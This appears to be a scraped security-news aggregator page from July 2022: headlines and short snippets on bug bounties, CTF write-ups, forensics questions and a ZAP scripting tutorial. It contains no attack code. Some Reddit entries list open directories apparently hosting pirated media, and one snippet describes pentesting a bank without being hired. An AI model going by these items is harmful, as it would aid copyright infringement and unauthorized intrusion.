    ZAP에서 모든 요청에 새로운 헤더나 데이터를 추가하려면 어떻게 해야할까요? 보통은 Replacer 라는 기능을 이용해서 값을 변경하거나 새로 추가할 수 있습니다. 이 과정은 Burpsuite에서도 비슷하게 Match and Replace란 기능을 사용해서 진행하죠. 다만 ZAP Scripting 중 매번 발생하는 요청을 통제할 수 있는 Sender script가 있습니다. 이를 이용하면 스크립트로도 동일하게 구현할 수 있는데요. 오늘은 이 2가지 방법의 차이점과 특징을 살펴보도록 하죠. Replacer 이름 그대로 값을 Replace 하는 기능입니다. 보통 단축키인 Cmd + R 이나 Options > Replacer 메뉴로 접근해서 Match 할 타입과 String을 지정하고 Replace 할 String을 지정하면 모든 Req/Res(Proxy, Manual Request, Scan 등)에서 이 정책이 적용되어 전송하게 됩니다. 이 때 Reuqest와 Response를 각각 지정할 수 있으며, 아래와 같은 Type을 가지고 있습니다. Request Request Header (will add if not present) Request Header String Request Body String Response Response Header (will add if not present) Response Header String Response Body String Sender Script Sender Script는 ZAP Scripting의 Type 중 하나로 송신 전, 수신 후 해당 스크립트의 이벤트 핸들러에 명시된 기능을 처리해주는 스크립트입니다. Scripts > HTTP Sender 에서 확인하실 수 있습니다. 그래서 작성하기에 따라 여러 기능을 만들 수 있으며 sendingRequest() 와 responseReceived()를 통해 처리가 가능합니다. 스크립팅이기 때문에 당연히 JS, Python, Ruby 등 여러가지 언어로 지원됩니다. Add header request (.py) headers = dict({"X-NEW-HEADER": "XXXXXxXX-xxXX-XXXx-xxxX-XXxxXxXXxXxX", "Cookie": "aaa=1234"});...
  • Open

    越南数据合规重点解读
    越南对数字经济的重视可见一斑,数据合规作为数字经济的核心合规需求,值得各出海越南企业的重视。
  • Open

    Officer_CIA: Retrospective
    Here is a retrospective of my best articles! You can also track my work entirely at my start.me (always use mullvad.net when visiting it)… Continue reading on Medium »
  • Open

    Treebox - Python AST sandbox challenge from Google CTF 2022
    While writing an article on how "Hello World" actually works in Python (written with j00ru and Adam Sawicki, and published in 100th issue of the Polish Programista magazine; we'll publish the English translation on our blogs around September/October 2022) I've played a bit with Python's ast module (as in Abstract Syntax Tree) and decided it would make a cool CTF challenge if I would make some restrictions on AST level and have folks try to bypass it. This wasn't of course the first challenge using AST on a CTF, though I did think to check only after I've already implemented it. Thankfully other challenges use different restrictions, so there was no collisions. Here are some of them though (leave a comment in case I've missed some): pysandbox @ TokyoWesterns CTF 4th 2018 (example…

  • Open

    Persistence Using Windows Terminal “Profiles”
    Profiles All The Way Down Continue reading on Medium »
  • Open

    Possible to make restricted files public on Phabricator via Diffusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1560717 - Bounty: $2000
    Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation
    Dropbox disclosed a bug submitted by sayaanalam: https://hackerone.com/reports/1428385 - Bounty: $4913
    @nextcloud/logger NPM package brings vulnerable ansi-regex version
    Nextcloud disclosed a bug submitted by ro0telqayser: https://hackerone.com/reports/1607601
  • Open

    IDOR pada NFT Marketplace naksh.org
    Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied… Continue reading on Medium »
    Business Logic Vulnerabilities == $$$
    According to OWASP , Business Logic Vulnerabilities are ways of using the legitimate processing flow of an application in a way that… Continue reading on Medium »
    5 easy ways to detect the clickjacking vulnerability
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    Complex libraries lead to hidden attack vectors Continue reading on InfoSec Write-ups »
    EAZI FINANCE TESTNET QUICK GUIDE
    ABOUT EAZI FINANCE Continue reading on Medium »
    ASN — Autonomous System Networks
    some` some` Continue reading on Medium »
    Hakrawler — information gathering tool for bug bounty hunters
    In this tutorial, Im just wanna talk about another hacking tool which developed for penetration testers and specially bug bounty hunters. Continue reading on Medium »
    Hacking the photographer
    Hi guys! Guess who’s back…back again! This blog will be great I could teach you a lot of things, this time to show you how I rooted the… Continue reading on Medium »
    Networking Fundamentals — for Ethical Hacking & Bug Hunting (day-3)
    Hello guys, it’s Selim back here with another interesting article. In the previous article, we learn about how and why a beginner should… Continue reading on Medium »
    Appointment Starting Point HackTheBox Writeup.
    Appointment is a very good lab to practice for Databases related security isssues. So in this writeup[walkthrough] we are going to exploit… Continue reading on Medium »
  • Open

    google home page
    Hello, I don't know if it is normal or not? But instead of being google.com, my Google home page looks like this: google.com/webhp?client=ms etc Is this normal or not? submitted by /u/nintenboye [link] [comments]
    Autoupdate Weak Passwords
    Is there a service that will allow me to import all of my usernames and passwords, then simply click a button and it will go and automatically strengthen all of my weak passwords on each of the sites where my security is lacking? submitted by /u/thats_taken_also [link] [comments]
    Bruteforce admin account on DC from unknown device
    In the DC logs, I found that there were 5,000+ failed logon attempts from an unknown device (that definaly is not part of us) to one of our admin account. How would you start an investigation? What I did: I checked the VPN logs. Maybe someone login to our corporate network via VPN, but nothing found. I aslo have a hypotesis, that maybe attaker not connected to internal network, there is some external services that are using AD creds to authenfication. So, the attack was from external to internal. But, I don't know how to check this. submitted by /u/athanielx [link] [comments]
    How does an app like “Flightradar24” know that I have gotten to an airport/a location.
    When I arrive at an airport I get a notification from the flight radar app on my iPhone that welcomes me to the airport (here’s a screen shot: https://postimg.cc/n91HvFS9) I just don’t understand how does the app know that even though it is running in the background and has only while using turned on in the location settings. Of course my #1 worry is privacy like does that mean it is constantly grabbing my location just to display me that notification once in a while when I goto the airport and #2 how does this impact battery life. If the app can descretly in the background get my location, can other apps do this? And how would I turn that off, I really don’t need Facebook or TikTok knowing where I am. (If the answer is obvious don’t absolutely roast me please lol) submitted by /u/SmallIce4 [link] [comments]
    Password manager for life
    Hi I am currently looking to get a password manager to install on my computer and that I'd keep for countless years I don't mind paying a price (small per month) or big upfront But I have a questions about servicves like bitwarden with a monthly subscription. If the company fails or somthing along those line How would the system still work ? I prefer an upfront payment anyway but the monthly payment for things such as these as always been bugging me Looking forward to your answers! submitted by /u/Simon__Puech [link] [comments]
    Information Security Compliance Jobs
    Hello, I didn’t know where to post this so I’m asking here as this subreddit seemed relevant. I’m an IS and IT compliance professional in Pakistan and have been working in the domain for the past six years mainly at consulting firms (Deloitte and KPMG) in Pakistan. I’ve recently switched to an insurance company in my country as an Information Security Manager but our country has been doing really badly economically which is the reason I’ve been looking into remote jobs that could potentially pay in USD or any other foreign currency. I always planned on moving abroad to pursue a career but that isn’t possible right because of my family which is why I’m inquiring about where I can find remote jobs for the domain. PS sorry if I made mistakes typing this as I’m on my phone and English isn’t my first language. submitted by /u/ads496 [link] [comments]
  • Open

    I'm Building a Self-Destructing USB Drive.
    submitted by /u/Machinehum [link] [comments]
    Critical Vulnerability Affecting Arris / Arris-variant DSL/Fiber Routers
    submitted by /u/sanitybit [link] [comments]
    ImHex - A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM
    submitted by /u/CyberMasterV [link] [comments]
    Manipulating Windows Tokens with Go
    submitted by /u/sciencestudent99 [link] [comments]
    Disclosing information with a side-channel in Django
    submitted by /u/albinowax [link] [comments]
  • Open

    South Park episodes in Fullscreen (4:3)
    SP 4:3 In this folder are the first 11 and 1/2 seasons of South Park in 4:3 Fullscreen before they were rerendered in 16:9 widescreen. The second half of season 12 is not included, as those episodes were actually originally produced in widescreen, but cropped into fullscreen for early TV airings and DVD releases. As of now, episodes are still being added, so if you notice that a season or episode is not included, don't worry, it'll all be there within the next couple of days. I don't have all of seasons 9 and 10 yet, so they may take an extra day or so. Edit: From the looks of it, I won’t be able to get season 10. If I find them, this post will be updated. submitted by /u/ImagineDraggin9 [link] [comments]
  • Open

    OSINT Tool — Emporis
    I heard about the website Emporis.com while on holiday reading the book “A Burglars Guide to the City” by Geoff Manaugh. I just want to… Continue reading on Medium »
    War in Ukraine / July 28
    Day 156: The tragedy in Olenivka Continue reading on Medium »
    Leaks: find and stop
    I was prompted to this topic by numerous publications of leaks of confidential information from internal databases of state bodies, which… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-29 Review
    EMBA - The firmware security analyzer by ourren VulnLab: Web Application Vulnerabilities Lab by ourren Vajra - Your Weapon To Cloud by ourren APT trends report Q2 2022 by ourren [HTB] October Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-29 Review
    EMBA - The firmware security analyzer by ourren VulnLab: Web Application Vulnerabilities Lab by ourren Vajra - Your Weapon To Cloud by ourren APT trends report Q2 2022 by ourren [HTB] October Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Clean definition of physical vs. logical data extraction?
    Hi there, it seems to me, that it's not that easy to very precisely define the difference between physical and logical data extraction. I tried something like: "physical data extraction means copying the data bitwise from the source whereas logical extraction involves some kind of interpretation of the data with any software." But it doesn't feel like it's all. Do you see my problem? submitted by /u/Knuust [link] [comments]
    Encase won't open HFS+ Hard Drive
    Hi everyone We have got to very similar hard drives with nearly the same problem. The hard drives are external usb disks with both HFS+ Case sensitive, not Journaled Filesystem. When we try to open them in Encase 21 oder 22 we get the error message "string or blob too long" We are currently trying to figure out of any of the files oder folders a corrupt by exporting them with GetData Forensic explorer, because this Tool can open the hard drives but gets problem with exporting all of the files. Did anyone had have this error message in encase and can tell me where or whats the problem is? submitted by /u/Ready_Note6642 [link] [comments]
    What weapons of choice are in you're forensics workstation software repertoire? Post your builds!
    I've just upgraded my workstation and bought an absolute beast of a laptop - I've begun the process of listing all my programs, apps, software, keys and tools and other useful bits and pieces that I have gathered over time on my main workstation PC and I am using the opportunity of a fresh new rebuild on the upgraded workstation and the beast of a laptop to tidy everything up and really streamline the whole setup with the new hardware. My programs and apps are mostly geared towards mobile forensics, and are as follows: ​ iPhone Backup Extractor Oxygen Forensic Detective Oxygen Data Extraxtion Wizard Oxygen Forensic Call Data Exert Oxygen Forensic Cloud Extractor Axiom Process Axiom Examine Autopsy (+ modules) iPhone Backup Extractor iMazing RazorSQL Sqlite DB Browser SQL Database Recovery Sqlite Forensic Explorer DCode Timestamp Converter FTK Forensic Toolkit Notepad++ HEX Editor (various programs) DrFone (Android and Ios) Stella Data Recovery Stella iPhone Recovery Stella OST Converter VLC Media Player + Codec Packs Most of the Nirsoft tools (some nifty little things there!) ​ .... Can anyone think of anything super useful that I haven't got? Mostly mobile forensics related stuff as you can see, that's my main area of interest - but there's a few broad covers there too ;) What do you consider the essential tools, programs and software that you have on your workstation? submitted by /u/dothepropellor [link] [comments]
  • Open

    Threat Hunting Techniques, Tactics and Methodologies
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Red Team Field Manual V2 by Ben Clark and Nick Downer has been released
    submitted by /u/ulriken_ [link] [comments]
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    FreeBuf早报 | 美国法院系统遭受重大攻击;乌克兰网络高官就俄乌网络战发表看法
    美国法院系统遭受重大攻击,密封文件面临风险;西班牙一核安全系统遭黑客攻击,部分地区服务中断数月。
    FreeBuf周报 | 51款应用遭上海通信管理局通报;大数据杀熟将遭严惩;美国与英国达成数据互通协议;Web3经济损失达历史新高
    各位Buffer周末好,以下是本周「FreeBuf周报」。
    Domino服务器SSL证书安装指南
    Domino服务器SSL证书安装指南。
    企业外包的安全风险及应对策略 | FreeBuf甲方群话题讨论
    在安全环节,外包往往会成为薄弱的一环。外包团队究竟会为企业带来哪些安全风险?我们又该如何应对外包所带来的问题?
    美预计将扩大与乌克兰的网络安全伙伴关系
    美国政府的网络安全机构已与其乌克兰网络安全机构签署了一项关于在网络安全方面加强合作的协议。
    暨南大学信息技术研究所招聘网络安全技术人员计划
    暨南大学信息技术研究所招聘网络安全服务项目经理、网络技术支持工程师、网络安全工程师(攻防对抗方向)等
    微软称发现奥地利间谍团伙,利用Windows和Adobe 0day攻击欧洲组织
    微软安全和威胁情报团队称发现一家奥地利公司销售间谍软件DSIRF,该软件是基于未知的Windows漏洞开发。
    谷歌禁用第三方Cookies计划再次推迟
    谷歌在本周周三表示,它再次将暂缓禁用Chrome网络浏览器中的第三方cookies的计划。
    越来越多受害者拒绝向黑客支付赎金
    受害者向黑客支付赎金的比例和赎金数额正在下降,这一趋势自 2021 年第四季度以来一直在持续。
    微软 SQL 服务器被黑,带宽遭到破坏
    攻击者通过使用捆绑广告的软件甚至是恶意软件入侵微软的SQL服务器,将设备转化为在线代理服务出租的服务器进行牟利。

  • Open

    Domain Enumeration Methodology
    Hey folks, today I start a new series of articles to discuss Active Directory Exploitation. This is the first article, we focus on domain… Continue reading on Medium »
    Sticky Notes is it safe?
    What if i told you it’s better to forget your password than write it down into a sticky note. Continue reading on Medium »
    Linux privilege escalation by abusing sudo
    In Linux, sudo stands for “super user do”. Whenever you execute a command in Linux and prefix it with sudo, it is executed with root… Continue reading on Medium »
  • Open

    HTML Injection via TikTok Ads Email Share
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376990 - Bounty: $1000
    Twitter Account hijack through broken link in https://runpanther.io
    Panther Labs disclosed a bug submitted by prakash142: https://hackerone.com/reports/1607429 - Bounty: $100
    Hijack all emails sent to any domain that uses Cloudflare Email Forwarding
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1419341 - Bounty: $6000
    Acronis True Image Local Privilege Escalation Due To Race Condition In Application Verification
    Acronis disclosed a bug submitted by vkas-afk: https://hackerone.com/reports/1251464 - Bounty: $250
    Off-by-slash vulnerability in nodejs.org and iojs.org
    Internet Bug Bounty disclosed a bug submitted by nagaro: https://hackerone.com/reports/1650273 - Bounty: $1200
  • Open

    nanopb Protobuf Decompiler - Anvil Secure
    submitted by /u/anvilventures [link] [comments]
    Building AppSec Pipeline for Continuous Visibility
    submitted by /u/nicksthehacker_ [link] [comments]
    Extracting Ghidra Decompiler Output with Python
    submitted by /u/dinobyt3s [link] [comments]
    Railway cybersecurity in the era of interconnected systems
    submitted by /u/sanitybit [link] [comments]
    Vulnerable by Design: Azure Red Team Attack and Detect Workshop
    submitted by /u/sanitybit [link] [comments]
    Abusing Duo Authentication Misconfigurations in Windows and Active Directory Environments
    submitted by /u/sanitybit [link] [comments]
    Spear Phishing on Modern Platforms
    submitted by /u/sanitybit [link] [comments]
    Passkeys: a push to take WebAuthn to the masses
    submitted by /u/sanitybit [link] [comments]
    Scraping Login Credentials With XSS
    submitted by /u/sanitybit [link] [comments]
  • Open

    Reading Message from Microsoft’s Private Yammer Group
    Hi All, Continue reading on Medium »
    Weak Session IDs (Low - Security) | DVWA Writeup
    Session hijacking is a good place to start career in bug bounty. This walkthrough will assist you in mastering a knowledge and skills. Continue reading on Medium »
    XSS in Open Redirect which uses attribute rel=”noopener follow” target=”_blank Via Browser Modern
    Hi everyone Continue reading on Medium »
    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    Hey 👋 Continue reading on Medium »
    How I became a millionaire in 3h | Fintech Bug Bounty — Part 1
    Lately, I’ve been doing some pentesting on a bank. It’s not like they hired me, but I felt curious about their infrastructure and asked… Continue reading on Medium »
    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    Moral of the story — be careful when you refactor code Continue reading on InfoSec Write-ups »
    Write Up Bug pada Aplikasi UIN Maulana Malik Ibrahim
    Kali ini saya akan menceritakan pengalaman saya tentang Bug yang saya temukan pada aplikasi UIN Maulana Malik Ibrahim Malang. Continue reading on Medium »
    GALAXYBLITZ BETA CAMPAIGN $100,000 TO BE SHARE
    Galaxy Blitz is a Play To Earn strategy NFT game where you lead the descendants of humanity to forge a new empire. Continue reading on Medium »
  • Open

    Nothing new or spectacular just having some fun. Golang redteaming.
    submitted by /u/allbetsroffnow [link] [comments]
  • Open

    dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier
    The dotnetfile library extracts useful information from .NET PE files and can overcome common techniques malware authors use to break parsing. The post dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier appeared first on Unit 42.
  • Open

    Windows and Linux Authentication Bypass with new version of AIM (+ virtual DD)
    submitted by /u/DFIRScience [link] [comments]
    How long does it take cellebrite to get back with a quote?
    I am doing a lab refresh and have contacted cellebrite for a quote, I had a call with them, then never heard back. It's has been over a week. Is this normal? Also if you were doing a lab refresh, what would be your dream setup? submitted by /u/MDCDF [link] [comments]
    SANS FOR585 index?
    Does anyone have a SANS FOR585 index that I could see? I'm curious whether mine is adequate. submitted by /u/tankton [link] [comments]
    Android 12 / Verizon / sms recovery
    Corporate investigation, not criminal. Sent phone away, forensic company sent it back saying they couldn’t do anything with it. So I said might as well take a stab at it. Using MobilEdit for recovery since I know very little about android. Pull a logical dump of the phone, get everything off the phone but nothing shows up in its deleted data scan. Take Samsung Smart Switch Backup to PC, save for later. Pursue xda forums, find that the phones bootloader is not unlockable, so no root access for me. Thanks Verizon. Boot to tsurgi, use android triage, but nothing helpful there. See that mobiledit can import a smart switch backup, try to import the one I took earlier, but it can’t read it, can only read backups to SD card. Ok then, go get a microSD card and usb-c connector, attach it…an…
    Trying to recover Messenger Conversation
    I already tried downloading Personal Data multiple times. Its not there. The chats were 3 weeks ago at most. Any tips? submitted by /u/SaqMadique [link] [comments]
  • Open

    Currently working workers.dev sites
    https://xp3.xev.workers.dev https://drive.spidercloud.workers.dev/1:/ https://cloud.eleventh-hour.workers.dev/0:/ https://www.savage69.workers.dev/0:/ https://otmbd01.sasohan.workers.dev https://td.lightdrive.workers.dev/1:/ https://mydrive.rahul112kapoor.workers.dev/0:/ https://netflixcrew.rahulinstinct.workers.dev/0:/ https://punishermirror.punisher876.workers.dev/0:// https://animated0.archives.workers.dev/ https://ps4.td-index.workers.dev/0:/ https://sparkling-sea-1d6d.bakingsoda.workers.dev ​ (The first one is mine) Pastebin submitted by /u/ilikemacsalot [link] [comments]
    D&D Books
    http://www.dnd.etherealspheres.com/eBooks/ A couple NSFW books submitted by /u/c-rn [link] [comments]
  • Open

    Looking for someone to do vulnerability research and develop exploits together.
    Greetings my fellow exploit developers, I hope you are doing well. As the post title said I am looking someone to do some real world vulnerability research and develop some exploits when we find something. I am having problems with keeping my motivated when I am not finding anything. Which leads to me dropping the project and doing something else which is usually unrelated to exploit dev and vulnerability research. I hope find someone or a small group people who are having similar problems so that we can each other motivated by talking to each everyday. Sharing each others finding and learning something new together. This is my thought process and the reason why I am making this post. So If there is anyone out there thinks something like can help us. Please free to reach out me in DM, Chat or Comment :) Thanks. submitted by /u/CJtheDev [link] [comments]
  • Open

    War in Ukraine / July 27
    Day 155: Above 40 hryvnias per dollar Continue reading on Medium »
  • Open

    Multiple Successful log ins from Internet explorer on my Microsoft account
    Okay so yesterday I went and checked my log in activity since I haven’t checked in about a week and when I looked I noticed that their was a successful log in five days ago from Internet explorer, as well when you expand it to see more info on it I saw that it had multiple times asked for additional verification. Strangely it was all from my own IP address. I have 2fa active so if anyone even tried to log into my account I need to approve it first so I have no idea how internet explorer signed into my account successfully even asking for additional information. As well I checked again this morning and their were two more times IE successfully logged in. I have scanned my computer nothing came up as well I have already changed my password for my account. submitted by /u/Alphem_384 [link] [comments]
    Pentesting
    I need advice on an effective tool for pen testing apps hosted on AWS. submitted by /u/dazkaly [link] [comments]
  • Open

    SecWiki News 2022-07-28 Review
    记一次授权非域环境下的大型内网横向渗透 by 路人甲 FIRST 2022 议题速递 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-28 Review
    记一次授权非域环境下的大型内网横向渗透 by 路人甲 FIRST 2022 议题速递 by Avenger 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 西班牙逮捕了破坏辐射警报系统的黑客;数据泄露成本创历史新高
    数据泄露成本创历史新高。
    从权限角度看滴滴处罚事件
    看看滴滴处罚结果中提到的违规收集用户个人信息的权限,对于日常使用的app可以进行权限自查~
    攻击数量创历史之最 | 《Web3安全季度报告》解读
    CertiK近期发布了《Web3 安全季度报告》(2022年第二季度版),报告描述了Web3网络安全质量的状况。
    离职也逃不掉,Uber协助司法部起诉前CSO
    Uber就2016年一起黑客攻击事件与美国司法部达成不起诉协议,其代价就是,Uber同意帮助美国司法部起诉其前首席安全官Sullivan。
    解读 | 东欧局势正影响全球DDoS攻击态势
    研究发现 DDoS 攻击已被积极用于政治目的。
    IBM数据泄露成本报告发布,数据泄露创历史新高
    IBM发布了最新的数据泄露成本报告。
    新钓鱼平台Robin Banks出现,多国知名金融组织遭针对
    近期出现了一个新型网络钓鱼服务平台,提供现成的网络钓鱼工具包,目标是知名银行和在线服务的客户。
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview

  • Open

    Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
    We provide an overview of CVE-2022-26809, CVE-2022-26923 and CVE-2022-26925, along with recommendations for mitigation. The post Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925) appeared first on Unit 42.
  • Open

    AWS Security(S3 buckets, ec2 snapshots, leaked aws keys)
    flaws.cloud challenge Continue reading on Medium »
    HackTheBox | Jerry | Write-up
    Hey Guys, Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on InfoSec Write-ups »
    GSuite domain takeover through delegation
    Continue reading on Medium »
  • Open

    10TB+ of Movies/TVShows, fast connection, couple of NSFW movies.
    submitted by /u/Pukit [link] [comments]
    Daft Club Directory (not fully archived but most links still work)
    submitted by /u/sastofficiallol [link] [comments]
    brewing and distillation guides
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Axiom pictures
    Looking at image in Axiom. There are 97,000 images. 95,000 are windows system or program defaults pictures. I looking for a single picture of contraband. Is there a way to prevent the stock window images from showing up? I’m looking for a setting to prevent seeing all the stock pics. Thanks in advance. submitted by /u/TxProud [link] [comments]
    Incident response and forensic practitioner survey
    I am looking for people with incident response and/or forensics experience to contribute towards an industry survey, designed to help identify ways of optimising service delivery and identify common issues facing IR teams. If you work in an incident response team at any level (junior, senior, or director) and/or conduct forensics following system compromises, please consider responding to my survey. It will only take 5 - 10 minutes, and your support would be greatly appreciated: https://forms.office.com/r/5NtbWAhNWe This is an anonymous survey, but there is the option to leave your email address so that you can stay informed about the results. If you'd prefer not to have your email linked to your submission, please DM me instead. submitted by /u/QoTSankgreall [link] [comments]
    How many drivers are loaded in memory at any given time (rough estimate)?
    I understand that circumstances vary, but what is your rough estimate? Consider a normal user workstation. Thanks, DBR submitted by /u/DeadBirdRugby [link] [comments]
    Software piracy investigation
    Can someone let me know how to forensically identify installation of pirated software? What are the artifacts we should look for? submitted by /u/Pepperknowsitall [link] [comments]
    Are professional organizations worth it?
    Hi, I am wondering if joining a professional organization is worth it. If it is, what are some you recommend for computer forensics and computer engineering (this will be crossposted to both subs)? submitted by /u/swatteam23 [link] [comments]
    ZIP file corrupt/not right format
    I’m currently undergoing a university assignment that requires analysis of a image file and finding evidence to prove of illegal activity. I’ve come across a ZIP file but when extracting it and inspecting it I was met with an error “corrupt/not right format”. I know this file has some important but doesn’t seem to have a standard encryption to it. Is there any methods on inspecting this file further to see if it contains any data or is being masked as a ZIP? (FTK manager wouldn’t open it, neither winrar) submitted by /u/fgtethancx [link] [comments]
  • Open

    AlienVault OSSIM logging?
    So I have OSSIM (but not USM) on a VM and was wondering: The official site says that OSSIM doesn't have log management, but does that mean that it's simply unable to, say, forward logs to a syslog server? Does OSSIM store logs? If so, how can I see how much storage those logs are taking up, and if not, how does OSSIM store its data then? submitted by /u/QueenofCodeNow [link] [comments]
    Help needed: plan of action to grow my tool set in regards to forensics and security
    TL;DR: I'm looking to make a plan of action to gain core knowledge on scripting and operating systems within the context of security. I'm curious to hear your thoughts of what such plan could look like and what home projects/education platforms could help achieve this. Hi all, I recently applied for a forensics job, but failed the assessment (which was expected). I'm CompTIA Net+ & Sec+ certified, but run into problems when I need to do hands on work. It should be noted the job was a medior/senior function, but I decided to give it a shot anyways for the learning experience, which made it extremely valuable. Things I ran into in this particular assignment: basic OS functionality windows & linux: what are the interesting places to start your research and how to securely assess them (processes, bash history, etc.). bash scripting. python scripting. I've done plenty of hack the box, but feel that the guided learning method keeps me from retaining the information. I might have the option to do a funded 10 week full time full stack development course, but that might be overkill and out of scope. I also have a home server which allows me to experiment, I'm just not sure for now how to utilize it for full effect, besides securing the network as good as possible. Thank you for taking the time to read and any advice you might have. submitted by /u/-Column- [link] [comments]
    Simple site Security audit - NoSQL injection, buffer overflow...
    Hi! I'm new to security audit and I have to do it. In college we got task to do about pen-testing the site with: Node.js, Express.js, Pug, MongoDB. This is simple "kitchen blog", you can post your recipes there. (Anticipating the questions, ethical hacking it's no my job, not my field of study. Onlything I want it's help, not making for me anything!) I have already done things like: Password confirmation in register site is wrong, you can set different second password. There is no data encryption beetwen us and server, password is visible (login and registration). Permissions issue due to normal user can delete another user account. NoSQL injection, a few different ways(I don't know if I did it right). User info update issue and small stuf about validation the insert data So after a good research I do not know if I did right the noSQL injection (noSQL it is not common to test I think). Maybe I need confirmation that I did right this. Things I need to test: Buffor overload NoSQL injection Canonical form There is anty tips, videos, articles that you can recommend for that? I have been watching and reading a lot stuff. Of course I'm doing research and I'm fighting with this another day... I think this is unusal post that will make you smile and help :D submitted by /u/puperinoo [link] [comments]
    Vulnerability analysis and information disclosure
    Hello folks, I was tasked to perform vulnerability analysis inside the corporate network and find any useful/disclosed information (public available IPs, shared printers/folders, files with passwords, routers with a default password, open ports, internet exposure services/admin pannels, etc.). Any information that I can find as a threat actor inside the target network. I had never done this before, this is my first task of this type, mostly I work in SOC analyst's stuff (phishing investigation, traffic monitoring, etc.) Could you please suggest any guides/articles/tools/checklists/books for achieving this goal and performing this analysis? I need to create a report with all findings. submitted by /u/TRYH0 [link] [comments]
  • Open

    Creating Sock Puppet Accounts: Everything You Need To Know — Part 3.1
    Hey Folks! I hope you liked part -2 of my OSINT series. Continue reading on Medium »
    War in Ukraine / July 26
    Day 154: The number one goal is the Antonovsky bridge Continue reading on Medium »
  • Open

    Corrupting memory without memory corruption
    submitted by /u/surrealisticpillow12 [link] [comments]
    Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits
    submitted by /u/surrealisticpillow12 [link] [comments]
    Sternum Announces Free Security and Observability Platforms for OpenWrt IoT Devices
    submitted by /u/mesok8 [link] [comments]
    For 12 Hours, Was Part of Apple Engineering’s Network Hijacked by Russia’s Rostelecom?
    submitted by /u/danyork [link] [comments]
    Inside Matanbuchus: A Quirky Loader
    submitted by /u/jat0369 [link] [comments]
  • Open

    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hello Readers, Continue reading on Medium »
    Trayhackme RootMe Makine Çözümü
    Evreler: Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on Medium »
    MSA Weekly 5 [How to Get Sensitive Data Exposure on Web Application ]
    Data Sensitive Exposure Continue reading on Medium »
    Approaching a Wordpress Site for Bugs :)
    Hi Geeks, This is Aravind here with another blog which may help you in finding bugs on Wordpress sites easily. I have also attached few of… Continue reading on Medium »
    How a Race Condition made these crypto hackers $5000 bug bounty
    Moral of the story — test concurrent requests Continue reading on InfoSec Write-ups »
    ALLIANCEBLOCK TESTNET BUG BOUNTY QUICK GUIDE
    About AllianceBlock Continue reading on Medium »
  • Open

    SecWiki News 2022-07-27 Review
    DeepJIT:用于实时缺陷预测的端到端深度学习框架 by ourren 基于AST变化嵌入的实时缺陷预测 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-27 Review
    DeepJIT:用于实时缺陷预测的端到端深度学习框架 by ourren 基于AST变化嵌入的实时缺陷预测 by ourren 更多最新文章,请访问SecWiki
  • Open

    Microsoft again reverses course, will block macros by default
    submitted by /u/ulriken_ [link] [comments]
  • Open

    Catch from HackTheBox — Detailed Walkthrough
    No content preview
    How a Race Condition made these crypto hackers $5000 bug bounty
    No content preview
  • Open

    Catch from HackTheBox — Detailed Walkthrough
    No content preview
    How a Race Condition made these crypto hackers $5000 bug bounty
    No content preview
  • Open

    Catch from HackTheBox — Detailed Walkthrough
    No content preview
    How a Race Condition made these crypto hackers $5000 bug bounty
    No content preview
  • Open

    FreeBuf早报 | 优步与美国司法部就黑客案达成和解;洛杉矶港口每月遭到四千万次攻击
    优步已与美国司法部就其掩盖 2016 年 11 月的数据泄露事件达成和解,同意起诉其前首席安全官约瑟夫沙利文。
    关于栈迁移的那些事儿
    本篇文章意旨通过原理+例题的形式带领读者一步步理解栈迁移的原理以及在ctf中的应用。
    漏洞披露15分钟内,黑客即可完成漏洞扫描
    一份研究报告显示,攻击者在新 CVE 漏洞公开披露后 15 分钟内,就会扫描到有漏洞的端点。
    恶意应用程序上架谷歌商店,下载竟超1000万次
